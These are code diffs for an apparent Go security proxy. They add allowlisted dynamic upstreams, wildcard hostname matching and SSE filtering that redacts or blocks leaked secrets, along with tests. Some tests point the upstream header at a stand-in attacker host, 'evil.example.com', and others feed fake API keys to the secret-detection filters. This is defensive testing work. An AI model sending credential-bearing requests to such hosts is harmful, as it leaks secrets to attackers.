+		errMsg := `{"error": "response blocked"}`
 		resp.Body = io.NopCloser(bytes.NewBufferString(errMsg))
 		resp.ContentLength = int64(len(errMsg))
 		resp.Header.Set("Content-Length", fmt.Sprintf("%d", len(errMsg)))
@@ -298,6 +357,11 @@ func (p *Proxy) modifyResponse(resp *http.Response) error {
 	}
 
 	return nil
+}
+
+// isSSEContent checks if the content type is a Server-Sent Events stream.
+func isSSEContent(contentType string) bool {
+	return strings.Contains(strings.ToLower(contentType), "text/event-stream")
 }
 
 // isTextContent checks if the content type is text-based and should be filtered.

--- a/internal/proxy/http_test.go
+++ b/internal/proxy/http_test.go
@@ -1055,3 +1055,393 @@ func TestProxy_SealedMultipleValuesForSameHeader(t *testing.T) {
 		t.Error("sealed header prefix should be stripped")
 	}
 }
+
+func TestProxy_DynamicUpstreamAllowed(t *testing.T) {
+	var receivedHost string
+	upstream := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		receivedHost = r.Host
+		w.WriteHeader(http.StatusOK)
+		w.Write([]byte("ok"))
+	}))
+	defer upstream.Close()
+
+	vault := &mockVault{creds: map[string]string{"TEST_CRED": "token"}}
+	endpoint := config.Endpoint{
+		AllowedUpstreams: []string{upstream.URL},
+		Auth:             config.AuthConfig{Type: "bearer", CredentialEnv: "TEST_CRED"},
+	}
+	engine := policy.New([]config.Rule{{Match: config.Match{Method: "*"}, Action: "allow"}})
+
+	proxy := New(endpoint, vault, engine)
+	req := httptest.NewRequest("GET", "/tasks", nil)
+	req.Header.Set("X-Wardgate-Upstream", upstream.URL)
+	rec := httptest.NewRecorder()
+
+	proxy.ServeHTTP(rec, req)
+
+	if rec.Code != http.StatusOK {
+		t.Errorf("expected 200, got %d", rec.Code)
+	}
+	if receivedHost == "" {
+		t.Error("expected request to reach upstream")
+	}
+}
+
+func TestProxy_DynamicUpstreamDenied(t *testing.T) {
+	vault := &mockVault{creds: map[string]string{"TEST_CRED": "token"}}
+	endpoint := config.Endpoint{
+		AllowedUpstreams: []string{"https://api.github.com"},
+		Auth:             config.AuthConfig{Type: "bearer", CredentialEnv: "TEST_CRED"},
+	}
+	engine := policy.New([]config.Rule{{Match: config.Match{Method: "*"}, Action: "allow"}})
+
+	proxy := New(endpoint, vault, engine)
+	req := httptest.NewRequest("GET", "/tasks", nil)
+	req.Header.Set("X-Wardgate-Upstream", "https://evil.example.com")
+	rec := httptest.NewRecorder()
+
+	proxy.ServeHTTP(rec, req)
+
+	if rec.Code != http.StatusBadRequest {
+		t.Errorf("expected 400 for denied upstream, got %d", rec.Code)
+	}
+}
+
+func TestProxy_DynamicUpstreamFallsBackToStatic(t *testing.T) {
+	var receivedAuth string
+	upstream := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		receivedAuth = r.Header.Get("Authorization")
+		w.WriteHeader(http.StatusOK)
+	}))
+	defer upstream.Close()
+
+	vault := &mockVault{creds: map[string]string{"TEST_CRED": "token"}}
+	endpoint := config.Endpoint{
+		Upstream:         upstream.URL,
+		AllowedUpstreams: []string{"https://other.example.com"},
+		Auth:             config.AuthConfig{Type: "bearer", CredentialEnv: "TEST_CRED"},
+	}
+	engine := policy.New([]config.Rule{{Match: config.Match{Method: "*"}, Action: "allow"}})
+
+	proxy := New(endpoint, vault, engine)
+	// No X-Wardgate-Upstream header - should use static upstream
+	req := httptest.NewRequest("GET", "/tasks", nil)
+	rec := httptest.NewRecorder()
+
+	proxy.ServeHTTP(rec, req)
+
+	if rec.Code != http.StatusOK {
+		t.Errorf("expected 200 for static fallback, got %d", rec.Code)
+	}
+	if receivedAuth != "Bearer token" {
+		t.Errorf("expected bearer token to be injected, got %q", receivedAuth)
+	}
+}
+
+func TestProxy_DynamicUpstreamHeaderStripped(t *testing.T) {
+	var receivedHeaders http.Header
+	upstream := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		receivedHeaders = r.Header.Clone()
+		w.WriteHeader(http.StatusOK)
+	}))
+	defer upstream.Close()
+
+	vault := &mockVault{creds: map[string]string{"TEST_CRED": "token"}}
+	endpoint := config.Endpoint{
+		AllowedUpstreams: []string{upstream.URL},
+		Auth:             config.AuthConfig{Type: "bearer", CredentialEnv: "TEST_CRED"},
+	}
+	engine := policy.New([]config.Rule{{Match: config.Match{Method: "*"}, Action: "allow"}})
+
+	proxy := New(endpoint, vault, engine)
+	req := httptest.NewRequest("GET", "/tasks", nil)
+	req.Header.Set("X-Wardgate-Upstream", upstream.URL)
+	rec := httptest.NewRecorder()
+
+	proxy.ServeHTTP(rec, req)
+
+	if rec.Code != http.StatusOK {
+		t.Fatalf("expected 200, got %d", rec.Code)
+	}
+	if receivedHeaders.Get("X-Wardgate-Upstream") != "" {
+		t.Error("X-Wardgate-Upstream header should be stripped before forwarding")
+	}
+}
+
+func TestProxy_DynamicUpstreamPolicyStillApplies(t *testing.T) {
+	upstream := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		t.Error("upstream should not be called when policy denies")
+	}))
+	defer upstream.Close()
+
+	vault := &mockVault{creds: map[string]string{"TEST_CRED": "token"}}
+	endpoint := config.Endpoint{
+		AllowedUpstreams: []string{upstream.URL},
+		Auth:             config.AuthConfig{Type: "bearer", CredentialEnv: "TEST_CRED"},
+	}
+	// Policy denies DELETE
+	engine := policy.New([]config.Rule{
+		{Match: config.Match{Method: "DELETE"}, Action: "deny", Message: "no deletes"},
+	})
+
+	proxy := New(endpoint, vault, engine)
+	req := httptest.NewRequest("DELETE", "/tasks/123", nil)
+	req.Header.Set("X-Wardgate-Upstream", upstream.URL)
+	rec := httptest.NewRecorder()
+
+	proxy.ServeHTTP(rec, req)
+
+	if rec.Code != http.StatusForbidden {
+		t.Errorf("expected 403 for policy deny with dynamic upstream, got %d", rec.Code)
+	}
+}
+
+func TestProxy_DynamicUpstreamNoHeaderNoStatic(t *testing.T) {
+	vault := &mockVault{creds: map[string]string{"TEST_CRED": "token"}}
+	endpoint := config.Endpoint{
+		AllowedUpstreams: []string{"https://api.example.com"},
+		Auth:             config.AuthConfig{Type: "bearer", CredentialEnv: "TEST_CRED"},
+	}
+	engine := policy.New([]config.Rule{{Match: config.Match{Method: "*"}, Action: "allow"}})
+
+	proxy := New(endpoint, vault, engine)
+	// No X-Wardgate-Upstream header and no static upstream
+	req := httptest.NewRequest("GET", "/tasks", nil)
+	rec := httptest.NewRecorder()
+
+	proxy.ServeHTTP(rec, req)
+
+	if rec.Code != http.StatusBadRequest {
+		t.Errorf("expected 400 when no upstream available, got %d", rec.Code)
+	}
+}
+
+func TestProxy_DynamicUpstreamNotConfigured(t *testing.T) {
+	upstream := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+	defer upstream.Close()
+
+	vault := &mockVault{creds: map[string]string{"TEST_CRED": "token"}}
+	endpoint := config.Endpoint{
+		Upstream: upstream.URL,
+		Auth:     config.AuthConfig{Type: "bearer", CredentialEnv: "TEST_CRED"},
+	}
+	engine := policy.New([]config.Rule{{Match: config.Match{Method: "*"}, Action: "allow"}})
+
+	proxy := New(endpoint, vault, engine)
+	// Sending X-Wardgate-Upstream when no allowed_upstreams configured
+	req := httptest.NewRequest("GET", "/tasks", nil)
+	req.Header.Set("X-Wardgate-Upstream", "https://evil.example.com")
+	rec := httptest.NewRecorder()
+
+	proxy.ServeHTTP(rec, req)
+
+	if rec.Code != http.StatusBadRequest {
+		t.Errorf("expected 400 when no allowed_upstreams configured, got %d", rec.Code)
+	}
+}
+
+func TestProxy_SSEPassthroughNoFilter(t *testing.T) {
+	sseData := "data: {\"text\": \"hello\"}\n\ndata: [DONE]\n\n"
+	upstream := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "text/event-stream")
+		w.WriteHeader(http.StatusOK)
+		w.Write([]byte(sseData))
+	}))
+	defer upstream.Close()
+
+	vault := &mockVault{creds: map[string]string{"TEST_CRED": "token"}}
+	endpoint := config.Endpoint{
+		Upstream: upstream.URL,
+		Auth:     config.AuthConfig{Type: "bearer", CredentialEnv: "TEST_CRED"},
+	}
+	engine := policy.New([]config.Rule{{Match: config.Match{Method: "*"}, Action: "allow"}})
+
+	proxy := New(endpoint, vault, engine)
+	req := httptest.NewRequest("GET", "/stream", nil)
+	rec := httptest.NewRecorder()
+
+	proxy.ServeHTTP(rec, req)
+
+	if rec.Code != http.StatusOK {
+		t.Errorf("expected 200 for SSE stream, got %d", rec.Code)
+	}
+	body, _ := io.ReadAll(rec.Body)
+	if string(body) != sseData {
+		t.Errorf("expected SSE data to pass through\ngot:  %q\nwant: %q", string(body), sseData)
+	}
+}
+
+func TestProxy_SSEFilterRedact(t *testing.T) {
+	// SSE stream with an API key in data
+	sseData := "data: {\"key\": \"sk-1234567890abcdef1234567890abcdef\"}\n\n"
+	upstream := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "text/event-stream")
+		w.WriteHeader(http.StatusOK)
+		w.Write([]byte(sseData))
+	}))
+	defer upstream.Close()
+
+	vault := &mockVault{creds: map[string]string{"TEST_CRED": "token"}}
+	endpoint := config.Endpoint{
+		Upstream: upstream.URL,
+		Auth:     config.AuthConfig{Type: "bearer", CredentialEnv: "TEST_CRED"},
+	}
+	engine := policy.New([]config.Rule{{Match: config.Match{Method: "*"}, Action: "allow"}})
+
+	f, err := filter.New(filter.Config{
+		Enabled:     true,
+		Patterns:    []string{"api_keys"},
+		Action:      filter.ActionRedact,
+		Replacement: "[REDACTED]",
+	})
+	if err != nil {
+		t.Fatalf("failed to create filter: %v", err)
+	}
+
+	proxy := New(endpoint, vault, engine)
+	proxy.SetFilter(f)
+
+	req := httptest.NewRequest("GET", "/stream", nil)
+	rec := httptest.NewRecorder()
+
+	proxy.ServeHTTP(rec, req)
+
+	if rec.Code != http.StatusOK {
+		t.Errorf("expected 200 for SSE redact, got %d", rec.Code)
+	}
+	body, _ := io.ReadAll(rec.Body)
+	bodyStr := string(body)
+	if strings.Contains(bodyStr, "sk-1234567890abcdef1234567890abcdef") {
+		t.Error("expected sensitive data to be redacted from SSE stream")
+	}
+	if !strings.Contains(bodyStr, "[REDACTED]") {
+		t.Error("expected redaction marker in SSE output")
+	}
+}
+
+func TestProxy_SSEFilterBlock(t *testing.T) {
+	sseData := "data: {\"key\": \"sk-1234567890abcdef1234567890abcdef\"}\n\n"
+	upstream := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "text/event-stream")
+		w.WriteHeader(http.StatusOK)
+		w.Write([]byte(sseData))
+	}))
+	defer upstream.Close()
+
+	vault := &mockVault{creds: map[string]string{"TEST_CRED": "token"}}
+	endpoint := config.Endpoint{
+		Upstream: upstream.URL,
+		Auth:     config.AuthConfig{Type: "bearer", CredentialEnv: "TEST_CRED"},
+	}
+	engine := policy.New([]config.Rule{{Match: config.Match{Method: "*"}, Action: "allow"}})
+
+	f, err := filter.New(filter.Config{
+		Enabled:  true,
+		Patterns: []string{"api_keys"},
+		Action:   filter.ActionBlock,
+	})
+	if err != nil {
+		t.Fatalf("failed to create filter: %v", err)
+	}
+
+	proxy := New(endpoint, vault, engine)
+	proxy.SetFilter(f)
+
+	req := httptest.NewRequest("GET", "/stream", nil)
+	rec := httptest.NewRecorder()
+
+	proxy.ServeHTTP(rec, req)
+
+	body, _ := io.ReadAll(rec.Body)
+	bodyStr := string(body)
+	if !strings.Contains(bodyStr, "event: error") {
+		t.Error("expected error event in blocked SSE stream")
+	}
+	if !strings.Contains(bodyStr, "response blocked") {
+		t.Error("expected blocked message in SSE error event")
+	}
+}
+
+func TestProxy_SSEPassthroughMode(t *testing.T) {
+	// SSE with sensitive data should pass through when sse_mode is "passthrough"
+	sseData := "data: {\"key\": \"sk-1234567890abcdef1234567890abcdef\"}\n\n"
+	upstream := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "text/event-stream")
+		w.WriteHeader(http.StatusOK)
+		w.Write([]byte(sseData))
+	}))
+	defer upstream.Close()
+
+	vault := &mockVault{creds: map[string]string{"TEST_CRED": "token"}}
+	endpoint := config.Endpoint{
+		Upstream: upstream.URL,
+		Auth:     config.AuthConfig{Type: "bearer", CredentialEnv: "TEST_CRED"},
+	}
+	engine := policy.New([]config.Rule{{Match: config.Match{Method: "*"}, Action: "allow"}})
+
+	f, err := filter.New(filter.Config{
+		Enabled:  true,
+		Patterns: []string{"api_keys"},
+		Action:   filter.ActionBlock,
+		SSEMode:  "passthrough",
+	})
+	if err != nil {
+		t.Fatalf("failed to create filter: %v", err)
+	}
+
+	proxy := New(endpoint, vault, engine)
+	proxy.SetFilter(f)
+
+	req := httptest.NewRequest("GET", "/stream", nil)
+	rec := httptest.NewRecorder()
+
+	proxy.ServeHTTP(rec, req)
+
+	if rec.Code != http.StatusOK {
+		t.Errorf("expected 200 for SSE passthrough mode, got %d", rec.Code)
+	}
+	body, _ := io.ReadAll(rec.Body)
+	if string(body) != sseData {
+		t.Errorf("expected SSE data to pass through in passthrough mode\ngot:  %q\nwant: %q", string(body), sseData)
+	}
+}
+
+func TestProxy_NonSSEFilterUnchanged(t *testing.T) {
+	// Non-SSE text responses should still be buffered and filtered as before
+	upstream := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "application/json")
+		w.Write([]byte(`{"message": "Your verification code is 123456"}`))
+	}))
+	defer upstream.Close()
+
+	vault := &mockVault{creds: map[string]string{"TEST_CRED": "token"}}
+	endpoint := config.Endpoint{
+		Upstream: upstream.URL,
+		Auth:     config.AuthConfig{Type: "bearer", CredentialEnv: "TEST_CRED"},
+	}
+	engine := policy.New([]config.Rule{{Match: config.Match{Method: "*"}, Action: "allow"}})
+
+	f, err := filter.New(filter.Config{
+		Enabled:  true,
+		Patterns: []string{"otp_codes"},
+		Action:   filter.ActionBlock,
+	})
+	if err != nil {
+		t.Fatalf("failed to create filter: %v", err)
+	}
+
+	proxy := New(endpoint, vault, engine)
+	proxy.SetFilter(f)
+
+	req := httptest.NewRequest("GET", "/verify", nil)
+	rec := httptest.NewRecorder()
+
+	proxy.ServeHTTP(rec, req)
+
+	// Non-SSE should still be blocked by filter
+	if rec.Code != http.StatusForbidden {
+		t.Errorf("expected 403 for non-SSE blocked content, got %d", rec.Code)
+	}
+}

--- a/internal/proxy/sse.go
+++ b/internal/proxy/sse.go
@@ -20,7 +20,6 @@ type sseFilterReader struct {
 }
 
 func (r *sseFilterReader) Read(p []byte) (int, error) {
-	// Return buffered data first
 	if r.buf.Len() > 0 {
 		return r.buf.Read(p)
 	}
@@ -29,13 +28,11 @@ func (r *sseFilterReader) Read(p []byte) (int, error) {
 		return 0, io.EOF
 	}
 
-	// Initialize scanner on first read
 	if r.scanner == nil {
 		r.scanner = bufio.NewScanner(r.reader)
 		r.scanner.Buffer(make([]byte, 0, 64*1024), 1024*1024) // 1MB max line
 	}
 
-	// Accumulate lines until we have a complete SSE message (blank line delimiter)
 	var lines []string
 	gotMessage := false
 
@@ -43,7 +40,6 @@ func (r *sseFilterReader) Read(p []byte) (int, error) {
 		line := r.scanner.Text()
 		lines = append(lines, line)
 
-		// Empty line marks end of an SSE message
 		if line == "" {
 			gotMessage = true
 			break
@@ -52,7 +48,8 @@ func (r *sseFilterReader) Read(p []byte) (int, error) {
 
 	if err := r.scanner.Err(); err != nil {
 		r.done = true
-		return 0, err
+		r.buf.WriteString("event: error\ndata: {\"error\":\"stream line too long\"}\n\n")
+		return r.buf.Read(p)
 	}
 
 	if !gotMessage && len(lines) == 0 {

--- a/internal/proxy/sse.go
+++ b/internal/proxy/sse.go
@@ -1,0 +1,156 @@
+package proxy
+
+import (
+	"bufio"
+	"bytes"
+	"io"
+	"strings"
+
+	"github.com/wardgate/wardgate/internal/filter"
+)
+
+// sseFilterReader wraps an SSE stream body and filters each SSE message
+// through the sensitive data filter individually.
+type sseFilterReader struct {
+	reader  io.ReadCloser
+	filter  *filter.Filter
+	scanner *bufio.Scanner
+	buf     bytes.Buffer
+	done    bool
+}
+
+func (r *sseFilterReader) Read(p []byte) (int, error) {
+	// Return buffered data first
+	if r.buf.Len() > 0 {
+		return r.buf.Read(p)
+	}
+
+	if r.done {
+		return 0, io.EOF
+	}
+
+	// Initialize scanner on first read
+	if r.scanner == nil {
+		r.scanner = bufio.NewScanner(r.reader)
+		r.scanner.Buffer(make([]byte, 0, 64*1024), 1024*1024) // 1MB max line
+	}
+
+	// Accumulate lines until we have a complete SSE message (blank line delimiter)
+	var lines []string
+	gotMessage := false
+
+	for r.scanner.Scan() {
+		line := r.scanner.Text()
+		lines = append(lines, line)
+
+		// Empty line marks end of an SSE message
+		if line == "" {
+			gotMessage = true
+			break
+		}
+	}
+
+	if err := r.scanner.Err(); err != nil {
+		r.done = true
+		return 0, err
+	}
+
+	if !gotMessage && len(lines) == 0 {
+		r.done = true
+		return 0, io.EOF
+	}
+
+	// Process the SSE message through the filter
+	filtered := r.filterSSEMessage(lines)
+	r.buf.WriteString(filtered)
+
+	if !gotMessage {
+		// End of stream reached mid-message
+		r.done = true
+	}
+
+	return r.buf.Read(p)
+}
+
+func (r *sseFilterReader) Close() error {
+	return r.reader.Close()
+}
+
+// filterSSEMessage filters a single SSE message (slice of lines including the trailing empty line).
+// Only data: fields are scanned/filtered; metadata lines pass through unchanged.
+func (r *sseFilterReader) filterSSEMessage(lines []string) string {
+	// Extract data content for scanning
+	var dataContent strings.Builder
+	hasData := false
+
+	for _, line := range lines {
+		if strings.HasPrefix(line, "data:") {
+			hasData = true
+			data := strings.TrimPrefix(line, "data:")
+			data = strings.TrimPrefix(data, " ") // Optional space after "data:"
+			if dataContent.Len() > 0 {
+				dataContent.WriteString("\n")
+			}
+			dataContent.WriteString(data)
+		}
+	}
+
+	if !hasData {
+		// No data fields - pass through unchanged (comments, empty messages, etc.)
+		return joinLines(lines)
+	}
+
+	content := dataContent.String()
+
+	// Don't filter the [DONE] sentinel
+	if content == "[DONE]" {
+		return joinLines(lines)
+	}
+
+	// Scan for sensitive data
+	matches := r.filter.Scan(content)
+	if len(matches) == 0 {
+		// No sensitive data - pass through unchanged
+		return joinLines(lines)
+	}
+
+	// Handle based on filter action
+	if r.filter.ShouldBlock(matches) {
+		// Emit generic error event and signal EOF.
+		// Do not include pattern names — they help attackers craft bypasses.
+		r.done = true
+		return "event: error\ndata: {\"error\":\"response blocked\"}\n\n"
+	}
+
+	// Redact: apply filter to data fields, keep metadata lines unchanged
+	filtered := r.filter.Apply(content, matches)
+	filteredParts := strings.Split(filtered, "\n")
+
+	var result strings.Builder
+	dataIdx := 0
+	for _, line := range lines {
+		if strings.HasPrefix(line, "data:") {
+			space := " "
+			if len(line) > 5 && line[5] != ' ' {
+				space = ""
+			}
+			if dataIdx < len(filteredParts) {
+				result.WriteString("data:" + space + filteredParts[dataIdx] + "\n")
+				dataIdx++
+			}
+		} else {
+			result.WriteString(line + "\n")
+		}
+	}
+
+	return result.String()
+}
+
+func joinLines(lines []string) string {
+	var b strings.Builder
+	for _, line := range lines {
+		b.WriteString(line)
+		b.WriteByte('\n')
+	}
+	return b.String()
+}

--- a/internal/proxy/sse_test.go
+++ b/internal/proxy/sse_test.go
@@ -1,0 +1,242 @@
+package proxy
+
+import (
+	"io"
+	"strings"
+	"testing"
+
+	"github.com/wardgate/wardgate/internal/filter"
+)
+
+// newTestFilter creates a filter for testing SSE functionality.
+func newTestFilter(t *testing.T, action filter.Action) *filter.Filter {
+	t.Helper()
+	f, err := filter.New(filter.Config{
+		Enabled:     true,
+		Patterns:    []string{"api_keys"},
+		Action:      action,
+		Replacement: "[REDACTED]",
+	})
+	if err != nil {
+		t.Fatalf("failed to create filter: %v", err)
+	}
+	return f
+}
+
+func TestSSEFilterReader_Passthrough(t *testing.T) {
+	input := "event: message\ndata: {\"text\": \"hello world\"}\n\n"
+	f := newTestFilter(t, filter.ActionRedact)
+
+	reader := &sseFilterReader{
+		reader: io.NopCloser(strings.NewReader(input)),
+		filter: f,
+	}
+
+	output, err := io.ReadAll(reader)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	if string(output) != input {
+		t.Errorf("expected passthrough for clean data\ngot:  %q\nwant: %q", string(output), input)
+	}
+}
+
+func TestSSEFilterReader_RedactSensitiveData(t *testing.T) {
+	// api_keys pattern should match "sk-..." style keys
+	input := "data: {\"key\": \"sk-1234567890abcdef1234567890abcdef\"}\n\n"
+	f := newTestFilter(t, filter.ActionRedact)
+
+	reader := &sseFilterReader{
+		reader: io.NopCloser(strings.NewReader(input)),
+		filter: f,
+	}
+
+	output, err := io.ReadAll(reader)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	result := string(output)
+	if strings.Contains(result, "sk-1234567890abcdef1234567890abcdef") {
+		t.Error("expected sensitive data to be redacted")
+	}
+	if !strings.Contains(result, "[REDACTED]") {
+		t.Error("expected redaction marker in output")
+	}
+}
+
+func TestSSEFilterReader_BlockSensitiveData(t *testing.T) {
+	input := "data: {\"key\": \"sk-1234567890abcdef1234567890abcdef\"}\n\n"
+	f := newTestFilter(t, filter.ActionBlock)
+
+	reader := &sseFilterReader{
+		reader: io.NopCloser(strings.NewReader(input)),
+		filter: f,
+	}
+
+	output, err := io.ReadAll(reader)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	result := string(output)
+	if !strings.Contains(result, "event: error") {
+		t.Error("expected error event on block")
+	}
+	if !strings.Contains(result, "response blocked") {
+		t.Error("expected blocked message in error event")
+	}
+}
+
+func TestSSEFilterReader_MetadataPassthrough(t *testing.T) {
+	input := "id: 123\nevent: message\nretry: 5000\ndata: {\"text\": \"hello\"}\n\n"
+	f := newTestFilter(t, filter.ActionRedact)
+
+	reader := &sseFilterReader{
+		reader: io.NopCloser(strings.NewReader(input)),
+		filter: f,
+	}
+
+	output, err := io.ReadAll(reader)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	result := string(output)
+	// Metadata lines should pass through unchanged
+	if !strings.Contains(result, "id: 123") {
+		t.Error("expected id line to pass through")
+	}
+	if !strings.Contains(result, "event: message") {
+		t.Error("expected event line to pass through")
+	}
+	if !strings.Contains(result, "retry: 5000") {
+		t.Error("expected retry line to pass through")
+	}
+}
+
+func TestSSEFilterReader_DoneSentinel(t *testing.T) {
+	input := "data: [DONE]\n\n"
+	f := newTestFilter(t, filter.ActionBlock)
+
+	reader := &sseFilterReader{
+		reader: io.NopCloser(strings.NewReader(input)),
+		filter: f,
+	}
+
+	output, err := io.ReadAll(reader)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	// [DONE] should pass through even with block action
+	if string(output) != input {
+		t.Errorf("expected [DONE] to pass through unchanged\ngot:  %q\nwant: %q", string(output), input)
+	}
+}
+
+func TestSSEFilterReader_MultipleMessages(t *testing.T) {
+	input := "data: {\"text\": \"hello\"}\n\ndata: {\"text\": \"world\"}\n\ndata: [DONE]\n\n"
+	f := newTestFilter(t, filter.ActionRedact)
+
+	reader := &sseFilterReader{
+		reader: io.NopCloser(strings.NewReader(input)),
+		filter: f,
+	}
+
+	output, err := io.ReadAll(reader)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	// All messages should pass through (no sensitive data)
+	if string(output) != input {
+		t.Errorf("expected clean messages to pass through\ngot:  %q\nwant: %q", string(output), input)
+	}
+}
+
+func TestSSEFilterReader_CommentLines(t *testing.T) {
+	input := ": this is a comment\ndata: {\"text\": \"hello\"}\n\n"
+	f := newTestFilter(t, filter.ActionRedact)
+
+	reader := &sseFilterReader{
+		reader: io.NopCloser(strings.NewReader(input)),
+		filter: f,
+	}
+
+	output, err := io.ReadAll(reader)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	if !strings.Contains(string(output), ": this is a comment") {
+		t.Error("expected comment line to pass through")
+	}
+}
+
+func TestSSEFilterReader_MultiLineData(t *testing.T) {
+	// Multiple data: lines in one message are concatenated with newlines
+	input := "data: {\"text\":\n" +
+		"data:  \"hello world\"}\n\n"
+	f := newTestFilter(t, filter.ActionRedact)
+
+	reader := &sseFilterReader{
+		reader: io.NopCloser(strings.NewReader(input)),
+		filter: f,
+	}
+
+	output, err := io.ReadAll(reader)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	result := string(output)
+	// Should contain both data lines
+	if !strings.Contains(result, "data:") {
+		t.Error("expected data lines in output")
+	}
+}
+
+func TestSSEFilterReader_OpenAIFormat(t *testing.T) {
+	// Simulate typical OpenAI SSE format
+	input := `data: {"id":"chatcmpl-123","object":"chat.completion.chunk","choices":[{"delta":{"content":"Hello"}}]}
+
+data: {"id":"chatcmpl-123","object":"chat.completion.chunk","choices":[{"delta":{"content":" World"}}]}
+
+data: [DONE]
+
+`
+	f := newTestFilter(t, filter.ActionRedact)
+
+	reader := &sseFilterReader{
+		reader: io.NopCloser(strings.NewReader(input)),
+		filter: f,
+	}
+
+	output, err := io.ReadAll(reader)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	// Clean data should pass through unchanged
+	if string(output) != input {
+		t.Errorf("expected OpenAI format to pass through\ngot:  %q\nwant: %q", string(output), input)
+	}
+}
+
+func TestSSEFilterReader_EmptyStream(t *testing.T) {
+	reader := &sseFilterReader{
+		reader: io.NopCloser(strings.NewReader("")),
+		filter: newTestFilter(t, filter.ActionRedact),
+	}
+
+	output, err := io.ReadAll(reader)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	if len(output) != 0 {
+		t.Errorf("expected empty output for empty stream, got %q", string(output))
+	}
+}

--- a/internal/proxy/sse_test.go
+++ b/internal/proxy/sse_test.go
@@ -240,3 +240,28 @@ func TestSSEFilterReader_EmptyStream(t *testing.T) {
 		t.Errorf("expected empty output for empty stream, got %q", string(output))
 	}
 }
+
+func TestSSEFilterReader_OversizedLine(t *testing.T) {
+	// Create a line that exceeds the 1MB scanner buffer limit.
+	// The scanner has a 1MB max token size; build a single line larger than that.
+	oversized := "data: " + strings.Repeat("x", 1024*1024+1) + "\n\n"
+	f := newTestFilter(t, filter.ActionRedact)
+
+	reader := &sseFilterReader{
+		reader: io.NopCloser(strings.NewReader(oversized)),
+		filter: f,
+	}
+
+	output, err := io.ReadAll(reader)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	result := string(output)
+	if !strings.Contains(result, "event: error") {
+		t.Error("expected SSE error event for oversized line")
+	}
+	if !strings.Contains(result, "stream line too long") {
+		t.Error("expected 'stream line too long' message in error event")
+	}
+}

--- a/internal/proxy/upstream.go
+++ b/internal/proxy/upstream.go
@@ -8,6 +8,11 @@ import (
 
 // MatchUpstream checks if a target URL is allowed by any of the given patterns.
 // Patterns are glob-style with scheme (e.g., "https://*.googleapis.com").
+//
+// Hostname glob rules:
+//   - "*" matches exactly one hostname segment (between dots)
+//   - "**" matches one or more hostname segments (across dots)
+//
 // Returns false for URLs with userinfo, non-HTTP schemes, or malformed input.
 func MatchUpstream(rawURL string, patterns []string) bool {
 	u, err := url.Parse(rawURL)
@@ -15,27 +20,22 @@ func MatchUpstream(rawURL string, patterns []string) bool {
 		return false
 	}
 
-	// Reject non-HTTP schemes
 	if u.Scheme != "http" && u.Scheme != "https" {
 		return false
 	}
 
-	// Reject userinfo (SSRF vector: http://user@internal-host)
 	if u.User != nil {
 		return false
 	}
 
-	// Reject URLs with query parameters or fragments (keep upstream clean)
 	if u.RawQuery != "" || u.Fragment != "" {
 		return false
 	}
 
-	// Must have a host
 	if u.Host == "" {
 		return false
 	}
 
-	// Match against each pattern
 	for _, pattern := range patterns {
 		if matchUpstreamPattern(u, pattern) {
 			return true
@@ -46,32 +46,31 @@ func MatchUpstream(rawURL string, patterns []string) bool {
 }
 
 // matchUpstreamPattern matches a parsed URL against a single pattern.
-// Pattern format: "https://*.example.com" or "https://api.example.com"
+// Pattern format: "https://*.example.com" or "https://**.example.com"
 func matchUpstreamPattern(u *url.URL, pattern string) bool {
-	// Replace * with WILDCARD so url.Parse doesn't treat globs as invalid path chars.
-	p, err := url.Parse(strings.ReplaceAll(pattern, "*", "WILDCARD"))
+	// Replace ** first, then * with distinct placeholders for url.Parse.
+	sanitized := strings.ReplaceAll(pattern, "**", "DOUBLEWILD")
+	sanitized = strings.ReplaceAll(sanitized, "*", "SINGLEWILD")
+
+	p, err := url.Parse(sanitized)
 	if err != nil {
 		return false
 	}
 
-	// Scheme must match exactly
-	patternScheme := strings.ReplaceAll(p.Scheme, "WILDCARD", "*")
+	patternScheme := strings.ReplaceAll(p.Scheme, "DOUBLEWILD", "**")
+	patternScheme = strings.ReplaceAll(patternScheme, "SINGLEWILD", "*")
 	if patternScheme != u.Scheme {
 		return false
 	}
 
-	// Match hostname using path.Match (glob matching where * matches any non-/ chars).
-	// Since hostnames contain no /, * matches across dots (e.g., *.example.com).
-	// Normalize to lowercase because DNS hostnames are case-insensitive.
-	patternHost := strings.ToLower(strings.ReplaceAll(p.Host, "WILDCARD", "*"))
-	matched, err := path.Match(patternHost, strings.ToLower(u.Host))
-	if err != nil || !matched {
+	patternHost := strings.ReplaceAll(p.Host, "DOUBLEWILD", "**")
+	patternHost = strings.ReplaceAll(patternHost, "SINGLEWILD", "*")
+	if !matchHostname(strings.ToLower(patternHost), strings.ToLower(u.Host)) {
 		return false
 	}
 
-	// If pattern has a path beyond "/", the URL path must match exactly or
